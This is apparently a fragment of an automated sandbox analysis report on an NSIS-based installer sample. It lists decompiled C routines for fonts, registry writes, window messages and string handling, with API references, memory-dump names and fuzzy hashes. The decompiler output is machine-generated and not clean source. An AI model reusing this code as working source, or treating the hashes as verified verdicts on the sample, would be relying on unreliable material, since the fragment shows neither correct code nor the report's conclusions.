                                                  0x00401ea5
                                                  0x00401eac
                                                  0x00401ebe
                                                  0x00401ec4
                                                  0x00401ec9
                                                  0x00401ed3
                                                  0x00402638
                                                  0x0040156d
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E51
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                  • ReleaseDC.USER32 ref: 00401E84
                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000), ref: 00406779
                                                  • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2584051700-0
                                                  • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                  • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                  • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                  • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E732016BD(struct HINSTANCE__* _a4, short* _a8) {
                                                  				_Unknown_base(*)()* _t7;
                                                  				void* _t10;
                                                  				int _t14;
                                                  
                                                  				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                  				_t10 = GlobalAlloc(0x40, _t14);
                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                  				_t7 = GetProcAddress(_a4, _t10);
                                                  				GlobalFree(_t10);
                                                  				return _t7;
                                                  			}






                                                  0x732016d7
                                                  0x732016e3
                                                  0x732016f0
                                                  0x732016f7
                                                  0x73201700
                                                  0x7320170c

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732022D8,?,00000808), ref: 732016D5
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732022D8,?,00000808), ref: 732016DC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732022D8,?,00000808), ref: 732016F0
                                                  • GetProcAddress.KERNEL32(732022D8,00000000), ref: 732016F7
                                                  • GlobalFree.KERNEL32 ref: 73201700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 2855127436ee993f86d741a1b8ddce141808c617a8ca8ddb7d55867fbd6e4be3
                                                  • Instruction ID: 72cca47d9ec4848cf48377105cda48d54fb6f5c6f5e420465a7fadd2486cbf2e
                                                  • Opcode Fuzzy Hash: 2855127436ee993f86d741a1b8ddce141808c617a8ca8ddb7d55867fbd6e4be3
                                                  • Instruction Fuzzy Hash: 9CF012731061387BD62026A78D4CD9B7E9DDF8B2F9B118211F71CA11A085615C05DBF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E00401C43(intOrPtr __edx) {
                                                  				int _t29;
                                                  				long _t30;
                                                  				signed int _t32;
                                                  				WCHAR* _t35;
                                                  				long _t36;
                                                  				int _t41;
                                                  				signed int _t42;
                                                  				int _t46;
                                                  				int _t56;
                                                  				intOrPtr _t57;
                                                  				struct HWND__* _t63;
                                                  				void* _t64;
                                                  
                                                  				_t57 = __edx;
                                                  				_t29 = E00402D84(3);
                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  				 *(_t64 - 0x18) = _t29;
                                                  				_t30 = E00402D84(4);
                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  				 *(_t64 + 8) = _t30;
                                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                  				}
                                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                  				_push(1);
                                                  				if(__eflags != 0) {
                                                  					_t61 = E00402DA6();
                                                  					_t32 = E00402DA6();
                                                  					asm("sbb ecx, ecx");
                                                  					asm("sbb eax, eax");
                                                  					_t35 =  ~( *_t31) & _t61;
                                                  					__eflags = _t35;
                                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                  					goto L10;
                                                  				} else {
                                                  					_t63 = E00402D84();
                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  					_t41 = E00402D84(2);
                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                                  					if(__eflags == 0) {
                                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                  						L10:
                                                  						 *(_t64 - 0x38) = _t36;
                                                  					} else {
                                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                  						asm("sbb eax, eax");
                                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                  					}
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                  					_push( *(_t64 - 0x38));
                                                  					E00406484();
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                  				return 0;
                                                  			}















                                                  0x00401c43
                                                  0x00401c45
                                                  0x00401c4c
                                                  0x00401c4f
                                                  0x00401c52
                                                  0x00401c5c
                                                  0x00401c60
                                                  0x00401c63
                                                  0x00401c6c
                                                  0x00401c6c
                                                  0x00401c6f
                                                  0x00401c73
                                                  0x00401c7c
                                                  0x00401c7c
                                                  0x00401c7f
                                                  0x00401c83
                                                  0x00401c85
                                                  0x00401cda
                                                  0x00401cdc
                                                  0x00401ce7
                                                  0x00401cf1
                                                  0x00401cf4
                                                  0x00401cf4
                                                  0x00401cfd
                                                  0x00000000
                                                  0x00401c87
                                                  0x00401c8e
                                                  0x00401c90
                                                  0x00401c93
                                                  0x00401c99
                                                  0x00401ca0
                                                  0x00401ca3
                                                  0x00401ccb
                                                  0x00401d03
                                                  0x00401d03
                                                  0x00401ca5
                                                  0x00401cb3
                                                  0x00401cbb
                                                  0x00401cbe
                                                  0x00401cbe
                                                  0x00401ca3
                                                  0x00401d06
                                                  0x00401d09
                                                  0x00401d0f
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                  • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                  • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                  • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                  				char _v68;
                                                  				char _v132;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t23;
                                                  				signed int _t24;
                                                  				void* _t31;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t44;
                                                  				signed int _t46;
                                                  				signed int _t50;
                                                  				signed int _t52;
                                                  				signed int _t53;
                                                  				signed int _t55;
                                                  
                                                  				_t23 = _a16;
                                                  				_t53 = _a12;
                                                  				_t44 = 0xffffffdc;
                                                  				if(_t23 == 0) {
                                                  					_push(0x14);
                                                  					_pop(0);
                                                  					_t24 = _t53;
                                                  					if(_t53 < 0x100000) {
                                                  						_push(0xa);
                                                  						_pop(0);
                                                  						_t44 = 0xffffffdd;
                                                  					}
                                                  					if(_t53 < 0x400) {
                                                  						_t44 = 0xffffffde;
                                                  					}
                                                  					if(_t53 < 0xffff3333) {
                                                  						_t52 = 0x14;
                                                  						asm("cdq");
                                                  						_t24 = 1 / _t52 + _t53;
                                                  					}
                                                  					_t25 = _t24 & 0x00ffffff;
                                                  					_t55 = _t24 >> 0;
                                                  					_t46 = 0xa;
                                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                  				} else {
                                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                  					_t50 = 0;
                                                  				}
                                                  				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                  				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                  				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                  				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                  				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                  			}



















                                                  0x00404d4f
                                                  0x00404d54
                                                  0x00404d5c
                                                  0x00404d5d
                                                  0x00404d6a
                                                  0x00404d72
                                                  0x00404d73
                                                  0x00404d75
                                                  0x00404d77
                                                  0x00404d79
                                                  0x00404d7c
                                                  0x00404d7c
                                                  0x00404d83
                                                  0x00404d89
                                                  0x00404d89
                                                  0x00404d90
                                                  0x00404d97
                                                  0x00404d9a
                                                  0x00404d9d
                                                  0x00404d9d
                                                  0x00404da1
                                                  0x00404db1
                                                  0x00404db3
                                                  0x00404db6
                                                  0x00404d5f
                                                  0x00404d5f
                                                  0x00404d66
                                                  0x00404d66
                                                  0x00404dbe
                                                  0x00404dc9
                                                  0x00404ddf
                                                  0x00404df0
                                                  0x00404e0c

                                                  APIs
                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                  • wsprintfW.USER32 ref: 00404DF0
                                                  • SetDlgItemTextW.USER32 ref: 00404E03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                  • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                  • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                  • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                  				void* _t20;
                                                  				void* _t21;
                                                  				int _t24;
                                                  				int _t30;
                                                  				intOrPtr _t33;
                                                  				void* _t34;
                                                  				intOrPtr _t37;
                                                  				void* _t39;
                                                  				void* _t42;
                                                  
                                                  				_t42 = __eflags;
                                                  				_t33 = __edx;
                                                  				_t30 = __ebx;
                                                  				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                  				_t34 = __eax;
                                                  				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                  				 *(_t39 - 0x44) = E00402DA6(2);
                                                  				_t20 = E00402DA6(0x11);
                                                  				 *(_t39 - 4) = 1;
                                                  				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                  				 *(_t39 + 8) = _t21;
                                                  				if(_t21 != __ebx) {
                                                  					_t24 = 0;
                                                  					if(_t37 == 1) {
                                                  						E00402DA6(0x23);
                                                  						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                  					}
                                                  					if(_t37 == 4) {
                                                  						 *0x40b5f0 = E00402D84(3);
                                                  						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                  						_t24 = _t37;
                                                  					}
                                                  					if(_t37 == 3) {
                                                  						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
                                                  					}
                                                  					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
                                                  						 *(_t39 - 4) = _t30;
                                                  					}
                                                  					_push( *(_t39 + 8));
                                                  					RegCloseKey();
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                  				return 0;
                                                  			}












                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248d
                                                  0x00402494
                                                  0x0040249e
                                                  0x004024a1
                                                  0x004024aa
                                                  0x004024b1
                                                  0x004024b8
                                                  0x004024bb
                                                  0x004024c1
                                                  0x004024cb
                                                  0x004024cf
                                                  0x004024da
                                                  0x004024da
                                                  0x004024e1
                                                  0x004024eb
                                                  0x004024f1
                                                  0x004024f4
                                                  0x004024f4
                                                  0x004024f8
                                                  0x00402504
                                                  0x00402504
                                                  0x0040251d
                                                  0x0040251f
                                                  0x0040251f
                                                  0x00402522
                                                  0x004025fd
                                                  0x004025fd
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp,00000023,00000011,00000002), ref: 004024D5
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp,00000000,00000011,00000002), ref: 00402515
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp,00000000,00000011,00000002), ref: 004025FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp
                                                  • API String ID: 2655323295-1093212153
                                                  • Opcode ID: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                  • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                  • Opcode Fuzzy Hash: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                  • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00405E0C(WCHAR* _a4) {
                                                  				WCHAR* _t9;
                                                  
                                                  				_t9 = _a4;
                                                  				_push( &(_t9[lstrlenW(_t9)]));
                                                  				_push(_t9);
                                                  				if( *(CharPrevW()) != 0x5c) {
                                                  					lstrcatW(_t9, 0x40a014);
                                                  				}
                                                  				return _t9;
                                                  			}




                                                  0x00405e0d
                                                  0x00405e1a
                                                  0x00405e1b
                                                  0x00405e26
                                                  0x00405e2e
                                                  0x00405e2e
                                                  0x00405e36

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-823278215
                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                  • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E732010E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                  				void* _v0;
                                                  				void* _t27;
                                                  				signed int _t29;
                                                  				void* _t30;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t38;
                                                  				void* _t40;
                                                  				void* _t48;
                                                  				void* _t54;
                                                  				void* _t63;
                                                  				void* _t64;
                                                  				signed int _t66;
                                                  				void* _t67;
                                                  				void* _t73;
                                                  				void* _t74;
                                                  				void* _t77;
                                                  				void* _t80;
                                                  				void _t81;
                                                  				void _t82;
                                                  				intOrPtr _t84;
                                                  				void* _t86;
                                                  				void* _t88;
                                                  
                                                  				 *0x7320506c = _a8;
                                                  				 *0x73205070 = _a16;
                                                  				 *0x73205074 = _a12;
                                                  				_a12( *0x73205048, E73201651, _t73);
                                                  				_t66 =  *0x7320506c +  *0x7320506c * 4 << 3;
                                                  				_t27 = E732012E3();
                                                  				_v0 = _t27;
                                                  				_t74 = _t27;
                                                  				if( *_t27 == 0) {
                                                  					L28:
                                                  					return GlobalFree(_t27);
                                                  				}
                                                  				do {
                                                  					_t29 =  *_t74 & 0x0000ffff;
                                                  					_t67 = 2;
                                                  					_t74 = _t74 + _t67;
                                                  					_t88 = _t29 - 0x66;
                                                  					if(_t88 > 0) {
                                                  						_t30 = _t29 - 0x6c;
                                                  						if(_t30 == 0) {
                                                  							L23:
                                                  							_t31 =  *0x73205040;
                                                  							if( *0x73205040 == 0) {
                                                  								goto L26;
                                                  							}
                                                  							E73201603( *0x73205074, _t31 + 4, _t66);
                                                  							_t34 =  *0x73205040;
                                                  							_t86 = _t86 + 0xc;
                                                  							 *0x73205040 =  *_t34;
                                                  							L25:
                                                  							GlobalFree(_t34);
                                                  							goto L26;
                                                  						}
                                                  						_t36 = _t30 - 4;
                                                  						if(_t36 == 0) {
                                                  							L13:
                                                  							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                  							_t74 = _t74 + _t67;
                                                  							_t34 = E73201312(E7320135A(_t38));
                                                  							L14:
                                                  							goto L25;
                                                  						}
                                                  						_t40 = _t36 - _t67;
                                                  						if(_t40 == 0) {
                                                  							L11:
                                                  							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                  							_t74 = _t74 + _t67;
                                                  							_t34 = E73201381(_t80, E732012E3());
                                                  							goto L14;
                                                  						}
                                                  						L8:
                                                  						if(_t40 == 1) {
                                                  							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                  							_t10 = _t81 + 4; // 0x4
                                                  							E73201603(_t10,  *0x73205074, _t66);
                                                  							_t86 = _t86 + 0xc;
                                                  							 *_t81 =  *0x73205040;
                                                  							 *0x73205040 = _t81;
                                                  						}
                                                  						goto L26;
                                                  					}
                                                  					if(_t88 == 0) {
                                                  						_t48 =  *0x73205070;
                                                  						_t77 =  *_t48;
                                                  						 *_t48 =  *_t77;
                                                  						_t49 = _v0;
                                                  						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                  						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                  							E73201603(_t49, _t77 + 8, 0x38);
                                                  							_t86 = _t86 + 0xc;
                                                  						}
                                                  						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                  						GlobalFree(_t77);
                                                  						goto L26;
                                                  					}
                                                  					_t54 = _t29 - 0x46;
                                                  					if(_t54 == 0) {
                                                  						_t82 = GlobalAlloc(0x40,  *0x7320506c +  *0x7320506c + 8);
                                                  						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                  						_t14 = _t82 + 8; // 0x8
                                                  						E73201603(_t14, _v0, 0x38);
                                                  						_t86 = _t86 + 0xc;
                                                  						 *_t82 =  *( *0x73205070);
                                                  						 *( *0x73205070) = _t82;
                                                  						goto L26;
                                                  					}
                                                  					_t63 = _t54 - 6;
                                                  					if(_t63 == 0) {
                                                  						goto L23;
                                                  					}
                                                  					_t64 = _t63 - 4;
                                                  					if(_t64 == 0) {
                                                  						 *_t74 =  *_t74 + 0xa;
                                                  						goto L13;
                                                  					}
                                                  					_t40 = _t64 - _t67;
                                                  					if(_t40 == 0) {
                                                  						 *_t74 =  *_t74 + 0xa;
                                                  						goto L11;
                                                  					}
                                                  					goto L8;
                                                  					L26:
                                                  				} while ( *_t74 != 0);
                                                  				_t27 = _v0;
                                                  				goto L28;
                                                  			}


























                                                  0x732010eb
                                                  0x73201100
                                                  0x73201109
                                                  0x7320110e
                                                  0x73201119
                                                  0x7320111c
                                                  0x73201125
                                                  0x73201129
                                                  0x7320112b
                                                  0x732012b0
                                                  0x732012ba
                                                  0x732012ba
                                                  0x73201132
                                                  0x73201132
                                                  0x73201137
                                                  0x73201138
                                                  0x7320113a
                                                  0x7320113d
                                                  0x73201256
                                                  0x73201259
                                                  0x73201271
                                                  0x73201271
                                                  0x73201278
                                                  0x00000000
                                                  0x00000000
                                                  0x73201285
                                                  0x7320128a
                                                  0x7320128f
                                                  0x73201294
                                                  0x7320129a
                                                  0x7320129b
                                                  0x00000000
                                                  0x7320129b
                                                  0x7320125b
                                                  0x7320125e
                                                  0x732011bc
                                                  0x732011bf
                                                  0x732011c2
                                                  0x732011cb
                                                  0x732011d0
                                                  0x00000000
                                                  0x732011d1
                                                  0x73201264
                                                  0x73201266
                                                  0x732011a2
                                                  0x732011a5
                                                  0x732011a8
                                                  0x732011b1
                                                  0x00000000
                                                  0x732011b1
                                                  0x73201164
                                                  0x73201165
                                                  0x73201177
                                                  0x73201180
                                                  0x73201184
                                                  0x7320118e
                                                  0x73201191
                                                  0x73201193
                                                  0x73201193
                                                  0x00000000
                                                  0x73201165
